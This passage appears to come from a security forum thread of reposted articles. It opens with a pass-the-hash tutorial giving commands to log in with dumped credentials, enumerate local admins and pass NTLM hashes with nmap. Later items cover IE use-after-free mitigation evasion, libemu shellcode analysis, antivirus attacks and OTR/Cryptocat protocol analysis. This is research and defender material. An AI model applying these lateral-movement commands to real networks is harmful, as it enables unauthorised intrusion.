But let's say everything's set up fairly well, the default Administrator account is disabled, and you end up dumping the hash of another local admin user on a box. How is this going to look in the field when you try your normal pivoting, and what options are still open? Your favorite scanner will still likely flag the credentials as valid on machines with the same account reused, as the following examples with the local admin of 'mike:password' demonstrate: However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket's functionality to browse the file shares, you'll encounter something like this: The "pth-winexe" example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like:

rdesktop -u mike -p password 192.168.52.151

But be careful: if you're going after a Windows 7 machine and a domain user is currently logged on, it will politely ask them if they want to allow your remote session in, meaning this is probably best left for after-hours. Also, interesting note: if you have hashes for a domain user and are dealing with the new restricted admin mode, you might be able to pass-the-hash with RDP itself! The Kali Linux guys have a great writeup on doing just that with xfreerdp. So here we are, with the RID 500 local Administrator account, as well as any domain accounts granted administrative privileges over a machine, still being able to utilize Metasploit or the pass-the-hash toolkit to install agents or execute code on target systems. Seems like it would be useful to be able to enumerate what name the local RID 500 account is currently using, as well as any network users in the local Administrators group. Unfortunately, even if you get access to a basic user account on some target machine and get in a position to abuse Active Directory, you can't query local administrators with WMI as you might like: But all hope is not lost, with backwards compatibility, the bane of Microsoft's existence, once again coming to our aid. The Active Directory Service Interfaces [ADSI] WinNT provider can be used to query information from domain-attached machines, even from non-privileged user accounts. A remnant of NT4 domain deployments, the WinNT provider in some cases can allow a non-privileged domain user to query information from target machines, including things like all the local groups and associated members (with SIDs and all). If we have PowerShell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like:

$computer = [ADSI]"WinNT://WINDOWS2,computer"
$computer.psbase.children | where { $_.psbase.schemaClassName -eq 'group' } | foreach { ($_.name)[0] }

If we want the members of a specific group, that's not hard either:

$members = @($([ADSI]"WinNT://WINDOWS2/Administrators").psbase.Invoke("Members"))
$members | foreach { $_.GetType().InvokeMember("ADspath", 'GetProperty', $null, $_, $null) }

These functions have been integrated into Veil-PowerView, as Get-NetLocalGroups and Get-NetLocalGroup respectively: Another function, Invoke-EnumerateLocalAdmins, has also been built and integrated. This will query the domain for hosts, and enumerate every machine for members of a specific local group (default of 'Administrators').
There are options for host lists, delay/jitter between host enumerations, and whether you want to pipe everything automatically to a CSV file: This gives you some nice, sortable .csv output with the server name, account, whether the name is a group or not, whether the account is enabled, and the full SID associated with the account. The built-in Administrator account is the one ending in *-500: And again, this is all with an unprivileged Windows domain account. (A short usage sketch of these PowerView functions follows at the end of this post.) If you just have a hash and want the same information without having to use PowerShell, the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along with a password or hash:

nmap -p U:137,T:139 --script-args 'smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c' --script=smb-enum-groups --script=smb-enum-users 192.168.52.151

If you want to use a domain account, set your flags to something like --script-args 'smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X'. You'll be able to enumerate the RID 500 account name and whether it's disabled, as well as all the members of the local Administrators group on the machine. If there's a returned member of the Administrators group that doesn't show up in the smb-enum-users list, like 'Jason' in this instance, it's likely a domain account. This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target. If you have any issues or questions with PowerView, submit any issues to the official Github page, hit me up on Twitter at @harmj0y, email me at will [at] harmj0y.net, or find me on Freenode in #veil, #armitage, or #pssec under harmj0y. And if you're doing the Blackhat/Defcon gauntlet this year, come check out the Veil-Framework BH Arsenal booth and/or my presentation on post-exploitation, as well as all the other awesome talks lined up this year! Sursa: Pass-the-Hash is Dead: Long Live Pass-the-Hash – harmj0y
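As promised above, a usage sketch of the PowerView functions mentioned in this post. The parameter names follow the 2014-era Veil-PowerView conventions and are assumptions that may differ in later releases:

# Load Veil-PowerView (path is illustrative)
Import-Module .\powerview.ps1

# List the local groups on a remote, domain-joined host
Get-NetLocalGroups -HostName WINDOWS2

# Enumerate members of the local Administrators group on that host
Get-NetLocalGroup -HostName WINDOWS2 -GroupName "Administrators"

# Sweep the domain and write the results to a sortable CSV
Invoke-EnumerateLocalAdmins -Delay 5 -OutFile local_admins.csv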
14. [h=2]On Breaking PHP-Based Cross-Site Scripting Protection Mechanisms In The Wild[/h] A talk by Ashar Javed @ Garage4Hackers WebCast (28-07-2014). Previously presented at the OWASP Spain Chapter Meeting, 13-06-2014, Barcelona (Spain). Slides: On Breaking PHP-Based Cross-Site Scripting Protections In The Wild by Ashar Javed
15. Shellcode Detection and Emulation with Libemu
Introduction
Libemu is a library which can be used for x86 emulation and shellcode detection. Libemu can be used in IDS/IPS/honeypot systems for emulating x86 shellcode, which can be further processed to detect malicious behavior. It can also be used together with Wireshark to pull shellcode off the wire to be analyzed, to analyze shellcode inside malicious .rtf/.pdf documents, etc. It has a lot of use cases, is used in numerous open-source projects like dionaea, thug, peepdf, pyew, etc., and plays an integral part in shellcode analysis. Libemu can detect and execute shellcode by using the GetPC heuristics, as we will see later in the article. The very first thing we can do is download Libemu via Git with the following command:

# git clone git://git.carnivore.it/libemu.git

If we would like to know how much code has been written for this project, we can simply execute sloccount, which will output the number of lines for each subdirectory and a total of 43,742 ANSI C code lines and 15 Python code lines. If we would rather take a look at nice graphs, we can visit the Ohloh web page to see something like below, where it's evident that about 50k lines of code have been written. The installation instructions can be found at [1], which is why we won't describe them in this article. We can also install Pylibemu, so we can interact with Libemu directly from Python (a short usage sketch follows below). Articol complet: Shellcode Detection and Emulation with Libemu - InfoSec Institute
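As a rough sketch of driving Libemu from Python through Pylibemu; the method names below are those used by projects like thug, but treat the exact signatures as assumptions:

import pylibemu

# Read a suspected shellcode blob (filename is illustrative)
shellcode = open("sample.bin", "rb").read()

emu = pylibemu.Emulator()
# GetPC heuristics: returns a non-negative offset when shellcode is detected
offset = emu.shellcode_getpc_test(shellcode)
if offset >= 0:
    emu.prepare(shellcode, offset)
    emu.test()
    # Human-readable profile of the Windows API calls the shellcode made
    print(emu.emu_profile_output)
else:
    print("No shellcode detected")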
16. Hacker turns ATM into 'Doom' arcade game by Lisa Vaas on July 29, 2014 Ever watched a Whirlpool washing machine explode after bouncing around the back yard for 3:42 minutes, a chunk of heavy metal ripping it to shreds from the inside out? There's a hacker responsible for this appliance torture, which he's now expanded to include rigging an ATM so you can play Doom on it (this involves less trauma than the washing machine, in that the ATM survives). Mashable identified the cash machine hacker as an "ingenious Australian lad", Ed Jones, who goes by the handle Aussie50. He says this about what he calls his engineering/scrap metal recycling work: I have a Tenancy to Destroy that which is not useful or repairable, or simply disobeys me. so be sure to watch my motor/appliance destruction videos if you are into stress testing things to the MAX! [sic] Over the weekend, Aussie50 posted a video showing off an ATM with its guts exposed, its original PIN pad turned into an arcade controller, the side panel used to select weapons. Its screen now eschews balances and transfers in favor of the familiar sight of a hand wrapped around a gun, going around dark corners and blasting stuff. Were you aware that ATMs - at least the NCR Personas ATM model Aussie50 and his software/wiring/logic partner Julian picked up - have a stereo soundboard in the back? Aussie50 now knows that. Sound system aside, questions abound. For one, can we play with it? That might be on the cards: Aussie50 said in the YouTube comments that he's mulling getting a coin mechanism to install below the card reader. But more security-focused is the question of where the hardware reconfiguration artist got this ATM. Did he pick it up on eBay? Also, should we worry about malicious hackers getting their hands on ATMs and rigging them so as to swindle funds? The answer, of course, is that they've already figured that stuff out. Recent examples of attackers getting into the juicy guts of publicly accessible ATMs abound. One memorable incident, from June, involved two Canadian 14-year-olds who came across an old ATM operators manual online, used its instructions to get into the machine's operator mode, broke into a local market's bank ATM on their school lunch break, printed off documentation regarding how much money was inside and how many withdrawals had been made that day, and changed the surcharge amount to one cent. In the case of that daring duo, I was initially blindsided by the fact that they were precocious tots who reported it to the bank without attempting to profit off their new-found knowledge. They could have wound up in a world of trouble, and/or they could have broken the system they were playing with. For example, as Naked Security's Paul Ducklin pointed out, the kids could have unwittingly triggered a mechanical test sequence that resulted in it spitting out banknotes, which would have left them in the tricky position of having turned into bank robbers. Given that Aussie50's hobby involves scrap metal recycling, we'll assume that he legally procured his ATM of Doom - therefore, he didn't need prior authorization to access somebody else's ATM's computer system (and innards!). Otherwise, if he were playing with somebody else's hardware, one would hope he'd get the go-ahead from the owner(s) of the system he targeted.
That's how so-called "white-hat" hackers do it, Paul pointed out: True "white hat" penetration testers don't take the first step without making sure that the scope of their work is known and condoned in writing by their customer. (They don't call it the "get out of jail free" letter for nothing.) Sursa: Hacker turns ATM into ‘Doom’ arcade game | Naked Security
  17. CVE: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5102
18. Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers By Dennis Lynch (@neato_itsdennis) on July 25, 2014, 10:15 PM Apple Inc. acknowledged on Friday that encrypted backup data such as texts, photos and contacts can be extracted from an iPhone by anyone with knowledge of extraction techniques, like Apple employees and law enforcement, Reuters reported. Anyone who wants access to that information just needs access to a computer that a user has "trusted" with data from his or her iPhone. Apple says the capability is only for diagnostic purposes, so "enterprise IT departments, developers and Apple [troubleshooters]" can access your phone's technical data, and that it isn't a security issue. "A user must have unlocked their device and agreed to trust another computer before that computer is able to access this limited diagnostic data," Apple said. "As we have said before, Apple has never worked with any government agency from any country to create a backdoor in any of our products or services." The issue was revealed by self-proclaimed "hacker" and security researcher Jonathan Zdziarski last week at the Hackers on Planet Earth conference in New York City. He says law enforcement or people with malicious intent could access the data in the same way an Apple "Genius" would access it. He calls it a security "back door," but insists he's not accusing Apple of "anything malicious" or of "working with the NSA"; rather, the flaw is there and could be used by someone seeking personal information. One Twitter user who appears to "jailbreak" iPhones, or unlock them from Apple software limitations, expressed his disapproval of Zdziarski's reveal, saying he was "giving away all the secrets!" Sursa: Apple Admits Encrypted iPhone Personal Data Can Be Extracted From 'Trusted' Computers
19. Efficacy of MemoryProtection against use-after-free vulnerabilities Simon_Z | July 28, 2014 As of the July 2014 patch of Internet Explorer, Microsoft has taken a major step in the evolution of exploit mitigations built into its browser. The new mitigation technology is called MemoryProtection (or MemProtect, for short) and has been shown to be quite effective against a range of use-after-free (UAF) vulnerabilities. Not all UAFs are equally affected, however. Here we'll discuss what MemoryProtection is and how it operates, and evaluate its effectiveness against various types of UAFs.

High-Level Description of MemoryProtection
The heart of MemoryProtection is a new strategy for freeing memory on the heap. When typical C++ code compiled for the Windows platform wishes to free a block of memory on the heap, the operation is implemented by a call to HeapFree. This is a call to the Windows heap manager, and it immediately makes the memory block available for reuse in future allocations. With MemoryProtection, when code wishes to free heap memory, the memory is not immediately freed at the heap manager level. Consequently, the memory is not made available for future allocations - at least not for a very important window in time. Instead of returning the memory to the Windows heap manager, MemoryProtection keeps the memory in an allocated state (as far as the heap manager is concerned), fills the memory with zeroes, and tracks the memory block on a list that MemoryProtection maintains of memory blocks waiting to be freed at the heap manager level. MemoryProtection will ultimately free the block at the heap manager level when it performs a periodic memory reclamation sweep, but only if the stack contains no outstanding references to the block. Since application-level frees and heap manager-level frees no longer occur at the same time, there is room for confusion whenever a "free" is mentioned. For the purposes of this post, a "free" will mean an application-level free unless specified otherwise. Also, when speaking of a free at the heap manager level we will sometimes speak of the memory being "released" or "returned" to the heap manager.

Detailed Description of MemoryProtection
MemoryProtection maintains a per-thread list of freed memory blocks that are still waiting to be freed at the heap manager level. We will call this the "wait list". When code in Internet Explorer wishes to free a block of memory on the heap, it calls the function MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree. (Note, however, that in many places this function is inlined, which means that its body is copied in its entirety into the compiled code of other functions.) This method performs the following steps (see the pseudocode sketch at the end of this post):
1. Check if the wait list for the current thread contains at least 100,000 total bytes of memory waiting to be freed at the heap manager level. If so, perform a reclamation sweep (see below).
2. Add an entry to the current thread's wait list, recording the block's address, its size, and whether the block resides on the regular process heap or on the isolated heap.
3. Fill the memory block with zeroes.
To perform a reclamation sweep, the steps are as follows. These steps are implemented by MemoryProtection::CMemoryProtector::MarkBlocks and MemoryProtection::CMemoryProtector::ReclaimUnmarkedBlocks. All operations apply to the current thread's wait list only.
1. Sort the wait list in increasing order of block address.
Place a mark on every wait list entry whose block is still pointed to by a pointer residing on the current thread’s stack. The pointer could be either a pointer to the start of the block or a pointer to any memory location falling within the block’s address range. 3. Iterate over the wait list. For each wait list entry encountered that is not marked, release the memory block at the heap manager level via an actual call to HeapFree, and remove the block from the wait list. Remove all marks from marked entries. In addition, an unconditional reclamation step is performed periodically. This occurs each time Internet Explorer’s WndProc is entered to service a message for the thread’s main window. At that time, the entire wait list is emptied and all waiting blocks are returned to the heap manager. The function performing this action is MemoryProtection::CMemoryProtector::ReclaimMemoryWithoutProtection. For efficiency, the wait list is rearranged in certain ways while performing the iteration in step 3 above. Therefore blocks are not necessarily freed in order of increasing address, nor are they always freed in the same order in which they are placed on the wait list. For research and debugging purposes it is often useful to be able to observe the behavior of Internet Explorer without MemoryProtection. In particular, MemoryProtection will interfere with the ability to use the heap manager’s call stack database to capture the call stack at the time of an application-level free. (By the same token, MemoryProtection actually makes it easier to capture the call stack at the time of allocation.) MemoryProtection can effectively be turned off via a manual procedure by writing the value 0xffffffff to the variable MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance. In WinDbg, this can be done via the following command: ed MSHTML!MemoryProtection::CMemoryProtector::tlsSlotForInstance 0xffffffff Effect of MemoryProtection on UAFs When an IE exploit leveraging a UAF is run unmodified against the newly MemoryProtection-enabled IE, the result will often resemble a null-pointer dereference. At the point in time when the exploit attempts to perform an allocation reusing memory from the freed block, the original memory block has not yet been returned to the heap manager; as a result, the exploit code fails to cause a new allocation at that location. Ultimately, when IE makes its improper use of the freed memory, any data read consists of zeroes. Often this will cause a quick and harmless termination of the IE process when the zero value is interpreted as a pointer and is dereferenced. It’s important to realize that even when the symptom appears to indicate that the bug is a null-pointer dereference, the underlying cause actually may be a UAF and a potential security risk. Let’s consider how an attacker might be able to modify the exploit in order to evade MemoryProtection. For a successful attack, the exploit must be able to trigger a memory sweep in between the free and the reallocation. Furthermore, at the time of this sweep, the stack must not contain any outstanding references to the freed block. It follows that there are some UAFs that are impossible to exploit under MemoryProtection. Specifically: If an outstanding stack reference exists for the entire period of time between the free and the later use, then it is impossible to cause reclamation of the freed block. This is a common situation that accounts for a large percentage of UAFs. 
Many UAFs are the result of a situation in which a free occurring at a deeper level in the call stack leaves a dangling pointer (sometimes a “this” pointer) at a higher level in the call stack. The crash occurs when the stack is popped to the level at which the dangling pointer resides. This very common type of UAF is now non-exploitable. As for UAFs not falling into the above category, however, the situation is quite different. Consider the case of a UAF in which a certain script action results in a dangling pointer being stored in heap memory, more or less permanently – by which we mean that the dangling pointer remains in place even after the return of all currently executing functions. The malicious script can then trigger the use of the dangling pointer at a much later point in time. We call these “long-lived” UAFs. In the case of a long-lived UAF, MemoryProtection offers no real defense. An attacker can ensure that the memory block is freed at the heap manager level by allowing Internet Explorer’s message loop to execute, as this will trigger an unconditional release of all waiting blocks. Though it may seem that the additional blocks released during this sweep have the potential to disrupt the exploit by causing various heap coalesces that are hard to predict, this problem can largely be eliminated by properly preparing the wait list so it will contain a minimum of entries at the time of the sweep. For UAFs not falling into the above categories MemoryProtection may provide partial or full mitigation. Consider the common case of a UAF in which the free and the use occur within the same script method. In the past, some of these have been exploitable conditions. MemoryProtection adds some additional hurdles that an attacker must clear. By referring to the ProtectedFree algorithm above, you can see that when IE calls ProtectedFree on a block of memory, the memory is never returned to the Windows heap manager at that time – not even if the wait list is very full. The return of the memory to the heap manager will always be delayed at least until the next call to ProtectedFree, at which point a sweep could occur. Therefore, an additional hurdle for an attacker in this situation is to find a way to force an additional free in between the free and the reallocation. This additional free must be performed on the same thread as the original free, since wait lists are maintained on a per-thread basis. For certain bugs this additional requirement will make exploitation impossible or too unreliable for use by an adversary. In other cases, when it is easy to force an additional free, MemoryProtection provides a weak form of protection by making it a bit more complex to arrange for a desired sequence of frees at the heap manager level. Typically it is possible to evade this protection through the addition of additional script actions that prepare the wait list, forcing it into a known desired state containing only a small number of entries. In Summary MemoryProtection is a significant new mitigation that makes Internet Explorer more secure by eliminating entire classes of UAFs and rendering them non-exploitable. For other classes of UAFs MemoryProtection is ineffective or only partially effective. Researchers should be aware that some IE crashes that appear to be null-pointer dereferences actually mask an underlying exploitable bug. Simon Zuckerbraun Security Researcher, HP ZDI Sursa: Efficacy of MemoryProtection against use-after-fre... - HP Enterprise Business Community
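To make the wait-list mechanics above easier to follow, here is a small Python model of the scheme. It is purely illustrative: the real logic lives inside MSHTML and scans the thread's actual stack, whereas here the "heap" is a plain bytearray and the caller supplies the set of "stack" pointers. All names (MemoryProtectorModel, WaitListEntry, protected_free, etc.) are mine, loosely modeled on the function names in the article; only the 100,000-byte threshold and the mark/reclaim split come from the description above.

# Toy model of MemoryProtection's deferred free. Illustrative only; names
# are hypothetical and the real implementation scans the thread's stack.

WAIT_LIST_THRESHOLD = 100_000  # bytes waiting before a sweep, per the post

class WaitListEntry:
    def __init__(self, addr, size):
        self.addr, self.size, self.marked = addr, size, False

class MemoryProtectorModel:
    def __init__(self, heap_free):
        self.wait_list = []          # app-freed blocks not yet released
        self.heap_free = heap_free   # stand-in for the real HeapFree

    def protected_free(self, addr, size, memory, stack_refs):
        # Step 1: sweep first if >= 100,000 bytes are waiting.
        if sum(e.size for e in self.wait_list) >= WAIT_LIST_THRESHOLD:
            self.reclaim_sweep(stack_refs)
        # Step 2: record the block on the per-thread wait list.
        self.wait_list.append(WaitListEntry(addr, size))
        # Step 3: zero the block so stale reads observe zeroes.
        memory[addr:addr + size] = bytes(size)

    def reclaim_sweep(self, stack_refs):
        # "MarkBlocks": sort by address, then mark entries that still have
        # a reference pointing anywhere inside the block's address range.
        self.wait_list.sort(key=lambda e: e.addr)
        for e in self.wait_list:
            if any(e.addr <= p < e.addr + e.size for p in stack_refs):
                e.marked = True
        # "ReclaimUnmarkedBlocks": release unmarked blocks, clear marks.
        survivors = []
        for e in self.wait_list:
            if e.marked:
                e.marked = False
                survivors.append(e)
            else:
                self.heap_free(e.addr)   # the actual HeapFree happens here
        self.wait_list = survivors

    def reclaim_all(self):
        # Models ReclaimMemoryWithoutProtection: the unconditional sweep
        # that runs when the main window's WndProc services a message.
        for e in self.wait_list:
            self.heap_free(e.addr)
        self.wait_list = []

# Example: a block with no outstanding "stack" reference is zeroed at the
# application-level free and released only by the later sweep.
freed = []
mp = MemoryProtectorModel(heap_free=freed.append)
mem = bytearray(256)
mp.protected_free(16, 32, mem, stack_refs=set())
mp.reclaim_all()   # models the WndProc-driven unconditional sweep
assert freed == [16] and all(b == 0 for b in mem[16:48])

The model makes the exploitation discussion concrete: between protected_free and a sweep, the block is still allocated (so an attacker cannot reallocate over it) and reads from it yield zeroes, which is why failed exploits often look like null-pointer dereferences.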
  20. Breaking Antivirus Software

Joxean Koret, COSEINC. SYSCAN 360, 2014.

- Introduction
- Attacking antivirus engines
- Finding vulnerabilities
- Exploiting antivirus engines
- Antivirus vulnerabilities
- Conclusions
- Recommendations

Download: http://www.syscan360.org/slides/2014_EN_BreakingAVSoftware_JoxeanKoret.pdf
  21. [h=3]Noodling about IM protocols[/h]

The last couple of months have been a bit slow in the blogging department. It's hard to blog when there are exciting things going on. But also: I've been a bit blocked. I have two or three posts half-written, none of which I can quite get out the door.

Instead of writing and re-writing the same posts again, I figured I might break the impasse by changing the subject. Usually the easiest way to do this is to pick some random protocol and poke at it for a while to see what we learn. The protocols I'm going to look at today aren't particularly 'random' -- they're both popular encrypted instant messaging protocols. The first is OTR (Off the Record Messaging). The second is Cryptocat's group chat protocol. Each of these protocols has a similar end-goal, but they get there in slightly different ways.

I want to be clear from the start that this post has absolutely no destination. If you're looking for exciting vulnerabilities in protocols, go check out someone else's blog. This is pure noodling.

The OTR protocol

OTR is probably the most widely-used protocol for encrypting instant messages. If you use IM clients like Adium, Pidgin or ChatSecure, you already have OTR support. You can enable it in some other clients through plugins and overlays.

OTR was originally developed by Borisov, Goldberg and Brewer and has rapidly come to dominate its niche. Mostly this is because Borisov et al. are smart researchers who know what they're doing. Also: they picked a cool name and released working code.

OTR works within the technical and usage constraints of your typical IM system. Roughly speaking, these are:

- Messages must be ASCII-formatted and have some (short) maximum length.
- Users won't bother to exchange keys, so authentication should be "lazy" (i.e., you can authenticate your partners after the fact).
- Your chat partners are all FBI informants, so your chat transcripts must be plausibly deniable -- so as to keep them from being used as evidence against you in a court of law.

Coming to this problem fresh, you might find goal (3) a bit odd. In fact, to the best of my knowledge no court in the history of law has ever used a cryptographic transcript as evidence that a conversation occurred. However it must be noted that this requirement makes the problem a bit more sexy. So let's go with it!

[Image caption: "Dammit, they used a deniable key exchange protocol" said no Federal prosecutor ever.]

The OTR (version 2/3) handshake is based on the SIGMA key exchange protocol. Briefly, it assumes that both parties generate long-term DSA public keys, which we'll denote by (pubA, pubB). Next the parties interact as follows:

[Image caption: The OTRv2/v3 AKE. Diagram by Bonneau and Morrison, all colorful stuff added. There's also an OTRv1 protocol that's too horrible to talk about here.]

There are four elements to this protocol:

1. Hash commitment. First, Bob commits to his share of a Diffie-Hellman key exchange (g^x) by encrypting it under a random AES key r and sending the ciphertext and a hash of g^x over to Alice.

2. Diffie-Hellman key exchange. Next, Alice sends her half of the key exchange protocol (g^y). Bob can now 'open' his share to Alice by sending the AES key r that he used to encrypt it in the previous step. Alice can decrypt this value and check that it matches the hash Bob sent in the first message. Now that both sides have the shares (g^x, g^y), they each use their secrets to compute a shared secret g^{xy} and hash the value several ways to establish shared encryption keys (c', Km2, Km'2) for subsequent messages. In addition, each party hashes g^{xy} to obtain a short "session ID". The sole purpose of the commitment phase (step 1) is to prevent either Alice or Bob from controlling the value of the shared secret g^{xy}. Since the session ID value is derived by hashing the Diffie-Hellman shared secret, it's possible to use a relatively short session ID value to authenticate the channel, since neither Alice nor Bob will be able to force this ID to a specific value.

3. Exchange of long-term keys and signatures. So far Alice and Bob have not actually authenticated that they're talking to each other, hence their Diffie-Hellman exchange could have been intercepted by a man-in-the-middle attacker. Using the encrypted channel they've previously established, they now set about to fix this. Alice and Bob each send their long-term DSA public key (pubA, pubB) and key identifiers, as well as a signature on (a MAC of) the specific elements of the Diffie-Hellman message (g^x, g^y) and their view of which party they're communicating with. They can each verify these signatures and abort the connection if something's amiss.**

4. Revealing MAC keys. After sending a MAC, each party waits for an authenticated response from its partner. It then reveals the MAC keys for the previous messages.

Lazy authentication. Of course if Alice and Bob never exchange public keys, this whole protocol execution is still vulnerable to a man-in-the-middle (MITM) attack. To verify that nothing's amiss, both Alice and Bob should eventually authenticate each other. OTR provides three mechanisms for doing this: the parties may exchange fingerprints (essentially hashes) of (pubA, pubB) via a second channel. Alternatively, they can exchange the "session ID" calculated in the second phase of the protocol. A final approach is to use the Socialist Millionaires' Problem to prove that both parties share the same secret.
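[Editor's sketch] To make the commit/exchange phases (elements 1 and 2) concrete, here is a toy Python sketch. Everything about its parameters is an assumption made for brevity: the group is a tiny toy group rather than OTR's real 1536-bit MODP group, a SHA-256 keystream XOR stands in for the AES encryption of g^x, and the signature phase is omitted. It only illustrates why the hash commitment keeps either side from steering the shared secret.

# Toy sketch of the OTR AKE's commitment and DH phases. Toy parameters and
# a hash-keystream stand-in for AES; NOT the real OTR group or cipher.
import hashlib, os

P, G = 2**127 - 1, 5          # toy group parameters, for illustration only

def h(*parts):
    return hashlib.sha256(b"".join(parts)).digest()

def xor_mask(key, data):
    # stand-in for AES encryption of g^x under the random key r
    mask = b""
    while len(mask) < len(data):
        mask += h(key, len(mask).to_bytes(4, "big"))
    return bytes(a ^ b for a, b in zip(data, mask))

# Message 1: Bob commits to g^x without revealing it.
x = int.from_bytes(os.urandom(16), "big") % P
gx_bytes = pow(G, x, P).to_bytes(16, "big")
r = os.urandom(16)
commit_enc, commit_hash = xor_mask(r, gx_bytes), h(gx_bytes)

# Message 2: Alice sends her share in the clear.
y = int.from_bytes(os.urandom(16), "big") % P
gy = pow(G, y, P)

# Message 3: Bob reveals r; Alice opens and checks the commitment.
opened = xor_mask(r, commit_enc)
assert h(opened) == commit_hash, "commitment mismatch"
gx_received = int.from_bytes(opened, "big")

# Both sides derive the same shared secret and a short session ID from it.
s_alice = pow(gx_received, y, P)
s_bob = pow(gy, x, P)
assert s_alice == s_bob
session_id = h(s_alice.to_bytes(16, "big"))[:8]

Because Bob's share is fixed (hash-committed) before he ever sees g^y, neither party can grind their share to force g^{xy}, and hence the session ID, to a chosen value.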
The OTR key exchange provides the following properties:

Protecting user identities. No user-identifying information (e.g., long-term public keys) is sent until the parties have first established a secure channel using Diffie-Hellman. The upshot is that a purely passive attacker doesn't learn the identity of the communicating partners -- beyond what's revealed by the higher-level IM transport protocol.*

Unfortunately this protection fails against an active attacker, who can easily smash an existing OTR connection to force a new key agreement and run an MITM on the Diffie-Hellman used during the next key agreement. This does not allow the attacker to intercept actual message content -- she'll get caught when the signatures don't check out -- but she can view the public keys being exchanged. From the client point of view the likely symptoms are a mysterious OTR error, followed immediately by a successful handshake. One consequence of this is that an attacker could conceivably determine which of several clients you're using to initiate a connection.

Weak deniability. The main goal of the OTR designers is plausible deniability. Roughly, this means that when you and I communicate there should be no binding evidence that we really had the conversation. This rules out obvious solutions like GPG-based chats, where individual messages would be digitally signed, making them non-repudiable.

Properly defining deniability is a bit complex. The standard approach is to show the existence of an efficient 'simulator' -- in plain English, an algorithm for making fake transcripts. The theory is simple: if it's trivial to make fake transcripts, then a transcript can hardly be viewed as evidence that a conversation really occurred.

OTR's handshake doesn't quite achieve 'strong' deniability -- meaning that anyone can fake a transcript between any two parties -- mainly because it uses signatures. As signatures are non-repudiable, there's no way to fake one without actually knowing your signing key. This reveals that we did, in fact, communicate at some point. Moreover, it's possible to create an evidence trail that I communicated with you, e.g., by encoding my identity into my Diffie-Hellman share (g^x). At the very least I can show that at some point you were online and we did have contact.

But proving contact is not the same thing as proving that a specific conversation occurred. And this is what OTR works to prevent. The guarantee OTR provides is that if the target was online at some point and you could contact them, there's an algorithm that can fake just about any conversation with the individual. Since OTR clients are, by design, willing to initiate a key exchange with just about anyone, merely putting your client online makes it easy for people to fake such transcripts.***

Towards strong deniability. The 'weak' deniability of OTR requires at least tacit participation of the user (Bob) for whom we're faking the transcript. This isn't a bad property, but in practice it means that fake transcripts can only be produced by either Bob himself, or someone interacting online with Bob. This certainly cuts down on your degree of deniability.

A related concept is 'strong deniability', which ensures that any party can fake a transcript using only public information (e.g., your public keys). OTR doesn't try to achieve strong deniability -- but it does try for something in between. The OTR version of deniability holds that an attacker who obtains the network traffic of a real conversation -- even if they aren't one of the participants -- should be able to alter the conversation to say anything he wants. Sort of.

The rough outline of the OTR deniability process is to generate a new message authentication key for each message (using Diffie-Hellman) and then reveal those keys once they've been used up. In theory, a third party can obtain this transcript and -- if they know the original message content -- they can 'maul' the AES-CTR encrypted messages into messages of their choice, then forge their own MACs on the new messages.

[Image caption: OTR message transport (source: Bonneau and Morrison, all colored stuff added).]

Thus our hypothetical transcript forger can take an old transcript that says "would you like a Pizza" and turn it into a valid transcript that says, for example, "would you like to hack STRATFOR"... Except that they probably can't, since the first message is too short and... oh lord, this whole thing is a stupid idea -- let's stop talking about it.

The OTRv1 handshake. Oh yes, there's also an OTRv1 protocol that has a few issues and isn't really deniable. Even better, an MITM attacker can force two clients to downgrade to it, provided both support that version. Yuck.

So that's the OTR protocol. While I've pointed out a few minor issues above, the truth is that the protocol is generally an excellent way to communicate. In fact it's such a good idea that if you really care about secrecy it's probably one of the best options out there.

Cryptocat

Since we're looking at IM protocols, I thought it might be nice to contrast with another fairly popular chat protocol: Cryptocat's group chat. Cryptocat is a web-based encrypted chat app that now runs on iOS (and also in Thomas Ptacek's darkest nightmares).

Cryptocat implements OTR for 'private' two-party conversations. However OTR is not the default. If you use Cryptocat in its default configuration, you'll be using its hand-rolled protocol for group chats.

The Cryptocat group chat specification can be found here, and it's remarkably simple. There are no "long-term" keys in Cryptocat. Diffie-Hellman keys are generated at the beginning of each session and re-used for all conversations until the app quits. Here's the handshake between two parties:

[Image caption: Cryptocat group chat handshake (current revision). Setting is Curve25519. Keys are generated when the application launches, and re-used through the session.]

If multiple people join the room, every pair of users repeats this handshake to derive a shared secret between every pair of users. Individuals are expected to verify each others' keys by checking fingerprints and/or running the Socialist Millionaire protocol.

Unlike OTR, the Cryptocat handshake includes no key confirmation messages, nor does it attempt to bind users to their identity or chat room. One implication of this is that I can transmit someone else's public key as if it were my own -- and the recipients of this transmission will believe that the person is actually part of the chat. Moreover, since public keys aren't bound to the user's identity or the chat room, you could potentially route messages between a different user (even a user in a different chat room) while making it look like they're talking to you. Since Cryptocat is a group chat protocol, there might be some interesting things you could do to manipulate the conversation in this setting.**** Does any of this matter? Probably not that much, but it would be relatively easy (and good) to fix these issues.

Message transmission and consistency. The next interesting aspect of Cryptocat is the way it transmits encrypted chat messages. One of the core goals of Cryptocat is to ensure that messages are consistent between individual users. This means that each user should be able to verify that the other users are receiving the same data it is.

Cryptocat uses a slightly complex mechanism to achieve this. For each pair of users in the chat, Cryptocat derives an AES key and a MAC key from the Diffie-Hellman shared secret. To send a message, the client (see the sketch after this article):

1. Pads the message by appending 64 bytes of random padding.
2. Generates a random 12-byte Initialization Vector for each of the N users in the chat.
3. Encrypts the message using AES-CTR under the shared encryption key for each user.
4. Concatenates all of the N resulting ciphertexts/IVs and computes an HMAC of the whole blob under each recipient's key.
5. Calculates a 'tag' for the message by hashing the following data: padded plaintext || HMAC-SHA512alice || HMAC-SHA512bob || HMAC-SHA512carol || ...
6. Broadcasts the N ciphertexts, IVs, MACs and the single 'tag' value to all users in the conversation.

When a recipient receives a message from another user, it verifies that:

1. The message contains a valid HMAC under its shared key.
2. The IV has not been received before from this sender.
